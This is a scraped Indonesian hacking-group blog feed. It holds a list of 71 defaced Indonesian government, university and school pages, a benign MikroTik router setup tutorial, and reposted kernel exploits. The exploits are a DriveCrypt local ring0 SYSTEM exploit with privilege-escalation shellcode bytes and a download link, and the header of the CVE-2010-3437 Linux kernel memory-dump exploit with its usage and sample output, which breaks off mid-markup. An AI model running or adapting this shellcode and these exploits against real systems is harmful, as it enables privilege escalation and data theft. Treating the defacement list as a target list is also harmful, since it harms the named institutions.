inilah daftar situs yang dititipi pesan-pesan dari peretas itu:<br /><br />1. http://semestaberjaya.com/indonesiaku.php<br />2. http://fs.uns.ac.id/indonesia.php<br />3. http://unj.ac.id/indonesia.php<br />4. http://www.unand.ac.id/foto/indonesia.htm<br />5. http://el82itb.org/indonesia.htm<br />6. http://unhalu.ac.id/staff/indonesia.htm<br />7. http://www.adhiguna.ac.id/indonesia.htm<br />8. http://www.stikes-insan-seagung.ac.id/indonesia.htm<br />9. http://www.himsya.ac.id/indonesia.htm<br />10. http://www.poltekpos.ac.id/indonesia.htm<br />11. http://informatika.uin-malang.ac.id/COPYRIGHT.php<br />12. http://www.mar-eng.its.ac.id/ina/akademik/admin/foto_berita/indonesia.htm<br />13. http://kaltimprov.go.id/indonesia.php<br />14. http://pengadilan.net/indonesia.php<br />15. http://bkp.deptan.go.id/indonesia.htm<br />16. http://kemenegpora.go.id/merdeka.html<br />17. http://sifa.kemenegpora.go.id/merdeka.html<br />18. http://www.lsf.go.id/merdeka.html<br />19. http://pekalongankota.go.id/merdeka.html<br />20. http://bpphp1.dephut.go.id/merdeka.html<br />21. http://bpphp2.dephut.go.id/merdeka.html<br />22. http://bpphp3.dephut.go.id/merdeka.html<br />23. http://bpphp4.dephut.go.id/merdeka.html<br />24. http://bpphp5.dephut.go.id/merdeka.html<br />25. http://bpphp6.dephut.go.id/merdeka.html<br />26. http://bpphp8.dephut.go.id/merdeka.html<br />27. http://bpphp9.dephut.go.id/merdeka.html<br />28. http://bpphp10.dephut.go.id/merdeka.html<br />29. http://manmajenang.sch.id/files/indonesia.php<br />30. http://spma-samarinda.sch.id/indonesia.htm<br />31. http://smkn1kalasan.sch.id/merdeka.html<br />32. http://smkn1madiun.sch.id/merdeka.html<br />33. http://robbirodliyya.sch.id/merdeka.html<br />34. http://smkypesampang.sch.id/merdeka.html<br />35. http://www.smpn3kpj.sch.id/merdeka.html<br />36. http://www.majesa.sch.id/merdeka.html<br />37. http://smkypkpwk.sch.id/merdeka.html<br />38. http://smpn5cirebon.sch.id/merdeka.html<br />39. http://smpn2balen.sch.id/merdeka.html<br />40. http://smpn1oku.sch.id/merdeka.html<br />41. http://smkn6palembang.sch.id/merdeka.html<br />42. http://smpn4gm.sch.id/merdeka.html<br />43. http://smpn5lht.sch.id/merdeka.html<br />44. http://manhokut.sch.id/merdeka.html<br />45. http://mtsdarussalampkp.sch.id/merdeka.html<br />46. http://smkn1barru.sch.id/merdeka.html<br />47. http://sman3bantul.sch.id/merdeka.html<br />48. http://sman1cepu.sch.id/merdeka.html<br />49. http://smpn1piyungan-btl.sch.id/merdeka.html<br />50. http://www.smansa-mjl.sch.id/merdeka.html<br />51. http://smp1pra-bws.sch.id/merdeka.html<br />52. http://smpn13bdg.sch.id/merdeka.html<br />53. http://smpn1panumbangan.sch.id/merdeka.html<br />54. http://smpmuh-ckn.sch.id/merdeka.html<br />55. http://smkkpbe-bdg.sch.id/merdeka.html<br />56. http://sditalamysubang.sch.id/merdeka.html<br />57. http://sdnbjs2bdg.sch.id/merdeka.html<br />58. http://www.smaplusbanyuasin.sch.id/merdeka.html<br />59. http://www.smkn1samarinda.com/merdeka.html<br />60. http://akademik.sma-alirsyad-clp.sch.id/merdeka.html<br />61. http://sma-alirsyad-clp.sch.id/merdeka.html<br />62. http://www.majesa.sch.id/merdeka.html<br />63. http://www.bellarminus-bks.sch.id/merdeka.html<br />64. http://sman2-wng.sch.id/merdeka.html<br />65. http://www.sma1pekalongan.sch.id/merdeka.html<br />66. http://kimomibutik.com/admin/foto_berita/indonesia.htm<br />67. http://www.smart-v-indonesia.com/indonesia.php<br />68. http://kabar-kini.com/indonesia.htm<br />69. http://semestaberjaya.com/indonesia.php<br />70. http://tikjo.my-php.net/indonesia.php<br />71. http://www.pusatk3hiperkes.com/indonesia.htm<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-8785832364894345389?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/0/da"><img src="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/1/da"><img src="http://feedads.g.doubleclick.net/~a/mXLHEdXszA90F-whqF766-MMObo/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/jUKhWatRokY" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/71-website-indonesia-dikerjai-hacker.htmltag:blogger.com,1999:blog-5679666230684006712.post-45430307056763379322011-01-01T19:25:00.000+07:002011-01-17T19:31:15.547+07:002011-01-17T19:31:15.547+07:00<!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" latentstylecount="156"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} </style> <![endif]--> <p class="MsoNormal">Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.<br /><br />1. Langkah pertama adalah install Mikrotik RouterOS pada PC</p><p class="MsoNormal"><br />2. Login Pada Mikrotik Routers melalui console :<br />MikroTik v2.9.7<br />Login: admin <enter><br />Password: (kosongkan) <enter><br /><br />Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin<br />dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.<br /><br />3. Untuk keamanan ganti password default<br />[admin@Mikrotik] > password<br />old password: *****<br />new password: *****<br />retype new password: *****<br />[admin@ Mikrotik]] ><br /><br />4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “killnine” (nama ini bebas terserah kalau mau diganti)<br />[admin@Mikrotik] > system identity set name=killnine<br />[admin@killnine] ><br /><br />5. Melihat interface pada Mikrotik Router<br />[admin@killnine] > interface print<br />Flags: X – disabled, D – dynamic, R – running<br /># NAME TYPE RX-RATE TX-RATE MTU<br />0 R ether1 ether 0 0 1500<br />1 R ether2 ether 0 0 1500<br />[admin@killnine] ><br /><br /><span class="fullpost">6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 192.168.0.254</span><br /><br /><span class="fullpost">[admin@killnine] > ip address add address=192.168.0.1</span><br /><span class="fullpost">netmask=255.255.255.0 interface=ether1</span><br /><span class="fullpost">[admin@killnine] > ip address add address=192.168.0.254</span><br /><span class="fullpost">netmask=255.255.255.0 interface=ether2</span><br /><br /><span class="fullpost">7. Melihat konfigurasi IP address yang sudah kita berikan</span><br /><span class="fullpost">[admin@killnine] >ip address print</span><br /><span class="fullpost">Flags: X – disabled, I – invalid, D – dynamic</span><br /><span class="fullpost"># ADDRESS NETWORK BROADCAST INTERFACE</span><br /><span class="fullpost">0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1</span><br /><span class="fullpost">1 192.168.0.254/24 192.168.0.0 192.168.0.255 ether2</span><br /><span class="fullpost">[admin@killnine] ></span><br /><br /><span class="fullpost">8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.1.1</span><br /><span class="fullpost">[admin@killnine] > /ip route add gateway=192.168.1.1</span></enter></enter></p> <p class="MsoNormal"><br /><span class="fullpost">9. Melihat Tabel routing pada Mikrotik Routers</span><br /><span class="fullpost">[admin@killnine] > ip route print</span><br /><span class="fullpost">Flags: X – disabled, A – active, D – dynamic,</span><br /><span class="fullpost">C – connect, S – static, r – rip, b – bgp, o – ospf</span><br /><span class="fullpost"># DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE</span><br /><span class="fullpost">0 ADC 192.168.0.0/24 192.168.0.254 ether2</span><br /><span class="fullpost">1 ADC 192.168.0.0/24 192.168.0.1 ether1</span><br /><span class="fullpost">2 A S 0.0.0.0/0 r 192.168.1.1 ether1</span><br /><span class="fullpost">[admin@killnine] ></span><br /><br /><span class="fullpost">10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar</span><br /><span class="fullpost">[admin@killnine] > ping 192.168.1.1</span><br /><span class="fullpost">192.168.1.1 64 byte ping: ttl=64 time<1><br /><span class="fullpost">192.168.1.1 64 byte ping: ttl=64 time<1><br /><span class="fullpost">2 packets transmitted, 2 packets received, 0% packet loss</span><br /><span class="fullpost">round-trip min/avg/max = 0/0.0/0 ms</span><br /><span class="fullpost">[admin@killnine] ></span><br /><br /><span class="fullpost">11. Setup DNS pada Mikrotik Routers</span><br /><span class="fullpost">[admin@killnine] > ip dns set primary-dns=202.134.0.155 allow-remoterequests=no</span><br /><span class="fullpost">[admin@killnine] > ip dns set secondary-dns=202.134.1.10 allow-remoterequests=no</span><br /><br /><span class="fullpost">12. Melihat konfigurasi DNS</span><br /><span class="fullpost">[admin@killnine] > ip dns print</span><br /><span class="fullpost">primary-dns: 202.134.0.155</span><br /><span class="fullpost">secondary-dns: 202.134.1.10</span><br /><span class="fullpost">allow-remote-requests: no</span><br /><span class="fullpost">cache-size: 2048KiB</span><br /><span class="fullpost">cache-max-ttl: 1w</span><br /><span class="fullpost">cache-used: 16KiB</span><br /><span class="fullpost">[admin@killnine] ></span><br /><br /><span class="fullpost">13. Tes untuk akses domain, misalnya dengan ping nama domain</span><br /><span class="fullpost">[admin@killnine] > ping yahoo.com</span><br /><span class="fullpost">216.109.112.135 64 byte ping: ttl=48 time=250 ms</span><br /><span class="fullpost">10 packets transmitted, 10 packets received, 0% packet loss</span><br /><span class="fullpost">round-trip min/avg/max = 571/571.0/571 ms</span><br /><span class="fullpost">[admin@killnine] ></span><br /><br /><span class="fullpost">Jika sudah berhasil reply berarti seting DNS sudah benar.</span><br /><br /><span class="fullpost">14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.</span><br /><span class="fullpost">[admin@killnine]> ip firewall nat add action=masquerade outinterface=</span><br /><span class="fullpost">ether1 chain:srcnat</span><br /><span class="fullpost">[admin@killnine] ></span><br /><br /><span class="fullpost">15. Melihat konfigurasi Masquerading</span><br /><span class="fullpost">[admin@killnine]>ip firewall nat print</span><br /><span class="fullpost">Flags: X – disabled, I – invalid, D – dynamic</span><br /><span class="fullpost">0 chain=srcnat out-interface=ether1 action=masquerade</span><br /><span class="fullpost">[admin@XAVIERO] ></span><br /><br /><span class="fullpost">Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server. </span></span></span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4543030705676337932?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/0/da"><img src="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/1/da"><img src="http://feedads.g.doubleclick.net/~a/aABz7BagE7z_lmJFTC8_IOxftqg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/ZpiVAQU_itA" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/install-mikrotik-sebagai-gateway.htmltag:blogger.com,1999:blog-5679666230684006712.post-13034799169607636282011-01-01T18:08:00.001+07:002011-01-21T10:22:21.262+07:002011-01-21T10:22:21.262+07:00<code class="cpp comments">/* drivecrypt-dcr.c</code><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Copyright (c) 2009 by <mu-b@digit-labs.org></mu-b@digit-labs.org></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* by mu-b - Sun 16 Aug 2009</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* - Tested on: DCR.sys</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Compile: MinGW + -lntdll</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* - Private Source Code -DO NOT DISTRIBUTE -</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*/</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdio.h></stdio.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdlib.h></stdlib.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <windows.h></windows.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <ddk h=""></ddk></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#define DCR_IOCTL 0x00073800</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp keyword bold">static</code> <code class="cpp plain">unsigned </code><code class="cpp color1 bold">char</code> <code class="cpp plain">win32_fixup[] =</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x89\xe5"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x81\xc5\xb4\x0c\x00\x00"</code><code class="cpp plain">;</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp comments">/* Win2k3 SP1/2 - kernel EPROCESS token switcher</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* by mu-b <mu-b@digit-lab.org></mu-b@digit-lab.org></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*/</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp keyword bold">static</code> <code class="cpp plain">unsigned </code><code class="cpp color1 bold">char</code> <code class="cpp plain">win2k3_ring0_shell[] =</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">/* _ring0 */</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\xb8\x24\xf1\xdf\xff"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x8b\x00"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x8b\xb0\x18\x02\x00\x00"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x89\xf0"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">/* _sys_eprocess_loop */</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x8b\x98\x94\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x81\xfb\x04\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x74\x11"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x8b\x80\x9c\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x2d\x98\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x39\xf0"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x75\xe3"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\xeb\x21"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">/* _sys_eprocess_found */</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x89\xc1"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x89\xf0"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">/* _cmd_eprocess_loop */</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x8b\x98\x94\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x81\xfb\x00\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x74\x10"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x8b\x80\x9c\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x2d\x98\x00\x00\x00"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x39\xf0"</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\x75\xe3"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">/* _not_found */</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp string">"\xcc"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">/* _cmd_eprocess_found</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* _ring0_end */</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><a href="http://www.exploit-db.com/exploits/15972/"><span style="font-weight: bold;">Download Full</span></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1303479916960763628?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/0/da"><img src="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/1/da"><img src="http://feedads.g.doubleclick.net/~a/sPvX3CNoMhWL7D6UFhqzRqgBn0Y/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/gHrmlOQK5Vo" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/drivecrypt-53-local-kernel-ring.htmltag:blogger.com,1999:blog-5679666230684006712.post-42472015413781073732010-12-28T18:19:00.000+07:002011-01-17T18:20:34.171+07:002011-01-17T18:20:34.171+07:00<code class="cpp comments">/*</code><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* cve-2010-3437.c</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Linux Kernel <></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Jon Oberheide <jon@oberheide.org></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* http://jon.oberheide.org</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* </code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Information:</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* https://bugzilla.redhat.com/show_bug.cgi?id=638085</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* pktcdvd_device from the global pkt_devs array. The index into this</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* array is provided directly by the user and is a signed integer, so the</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* comparison to ensure that it falls within the bounds of this array will</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* fail when provided with a negative index.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Usage:</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* $ gcc cve-2010-3437.c -o cve-2010-3437</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* $ ./cve-2010-3437</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* usage: ./cve-2010-3437 <address> <length></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* $ ./cve-2010-3437 0xc0102290 64</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] searching for pkt_devs kernel symbol...</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] found pkt_devs at 0xc086fcc0</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] opening pktcdvd device...</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] calculated dereference address of 0x790070c0</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] mapping page at 0x79007000 for pktcdvd_device dereference...</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] setting up fake pktcdvd_device structure...</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* [+] dumping kmem to output...</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* 55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* 55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Notes:</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Pass the desired kernel memory address and dump length as arguments.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* We can disclose 4 bytes of arbitrary kernel memory per ioctl call by </code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* specifying a large negative device index, causing the kernel to </code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* dereference to our fake pktcdvd_device structure in userspace and copy</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* data to userspace from an attacker-controlled address. Since only 4 </code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* bytes of kmem are disclosed per ioctl call, large dump sizes may take a</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* few seconds.</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Tested on Ubuntu Lucid 10.04. 32-bit only for now.</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*/</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td 